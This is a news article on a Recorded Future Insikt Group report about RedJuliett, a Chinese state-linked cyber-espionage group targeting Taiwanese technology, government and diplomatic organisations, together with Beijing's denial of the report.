A cybersecurity team called the Insikt Group published a report on Monday that found Chinese state-sponsored hackers have significantly intensified attacks on Taiwan, seemingly with an eye toward stealing Taiwanese technology and spying on Taiwan’s diplomatic initiatives.
The Insikt Group is the threat research division of Recorded Future, an international cybersecurity firm with both government and corporate clients spread across 75 countries.
The group’s report focused on “RedJuliett,” a cyber-espionage group believed to be sponsored by the Chinese government. RedJuliett’s activities were detected for the first time in August 2023, when Microsoft discovered a sizable cyber-espionage campaign targeting companies in Taiwan.
Microsoft dubbed the hacking threat “Flax Typhoon,” while cybersecurity firm CrowdStrike detected its activities at roughly the same time and named it “Ethereal Panda.” Insikt Group researchers were confident that all of these designations were names for the same cybersecurity threat actor.
The group pulled off some cyberattacks against other countries, including South Korea and the United States, but about 60 percent of its detected activity has been focused on Taiwan. RedJuliett’s activity has been traced back to the Chinese city of Fuzhou, which is close to Taiwan and hosts numerous Chinese intelligence operations targeting the island.
“While RedJuliett’s potential affiliation with either China’s Ministry of State Security MSS or People’s Liberation Army PLA is currently unknown, an operating location within Fuzhou is consistent with the group’s persistent focus on Taiwan,” the report said.
The Insikt Group found RedJuliett’s espionage activities against Taiwan between November 2023 and April 2024, hitting “over 70 academic, government, think tank, and technology organizations in Taiwan, as well as multiple de facto embassies operating on the island.”
Taiwan often lacks official embassies from other countries due to China’s political pressure. The de facto American embassy, for example, is an organization called the American Institute in Taiwan (AIT).
The cybersecurity report said:
Within Taiwan, we observed RedJuliett heavily target the technology industry, including organizations in critical technology fields. RedJuliett conducted vulnerability scanning or attempted exploitation against a semiconductor company and two Taiwanese aerospace companies that have contracts with the Taiwanese military.
Taiwan’s presidential election season began around the same time as RedJuliett’s increased activity, culminating in the election of William Lai Ching-te as the successor to President Tsai Ing-wen in January 2024. Lai was inaugurated in May 2024. He belongs to the same Democratic Progressive Party (DPP) as Tsai, so his victory marked the first time in the history of Taiwan’s democracy that the same party held the presidency for three consecutive terms.
The communist Chinese government hates both Tsai and Lai, dubbing them “separatists” and “insurrectionists.” Beijing deployed what Lai denounced as an “unprecedented” level of election interference to intimidate Taiwanese out of voting for him.
“In addition to political and military pressure, it is also using economic means, cognitive warfare, disinformation, threats and incentives. It has resorted to all means to interfere with this election,” Lai said in January.
Taiwanese President Lai Ching-te delivers his inaugural speech after being sworn into office during the inauguration ceremony at the Presidential Office Building in Taipei on May 20, 2024. (SAM YEH/AFP via Getty Images)
The Insikt Group said it could not determine how successful RedJuliett’s cyberattacks were, as it could observe the attempts from outside of targeted networks but could not see the results.
RedJuliett had an arsenal of sophisticated hacking tools at its disposal, including code that exploited vulnerabilities in networks, web servers, and security software. The group employed “living off the land” (LotL) techniques, a disturbing new trend in cyber espionage in which hackers penetrate a system, hide their malicious code among the many legitimate programs running on a large network, and remain dormant for long periods.
LotL tactics are alarming to cybersecurity researchers because they suggest the hackers are lying in wait for some anticipated signal — like a declaration of war by the country that sponsors them — rather than causing damage or stealing data immediately.
The report concluded:
RedJuliett’s activities align with Beijing’s objectives to gather intelligence on Taiwan’s economic policy, trade, and diplomatic relations. The group also targeted multiple critical technology companies, highlighting the strategic importance of this sector for Chinese state-sponsored threat actors.
The Chinese Foreign Ministry disputed Recorded Future’s report on Monday, the same way it dismisses all allegations of Chinese hacker activity.
Chinese Foreign Ministry spokeswoman Mao Ning claimed she was “not aware” of the report, but she claimed, without evidence, that Recorded Future “fabricated disinformation on so-called Chinese hacking operations” in the past, so the company has “no professionalism or credibility.”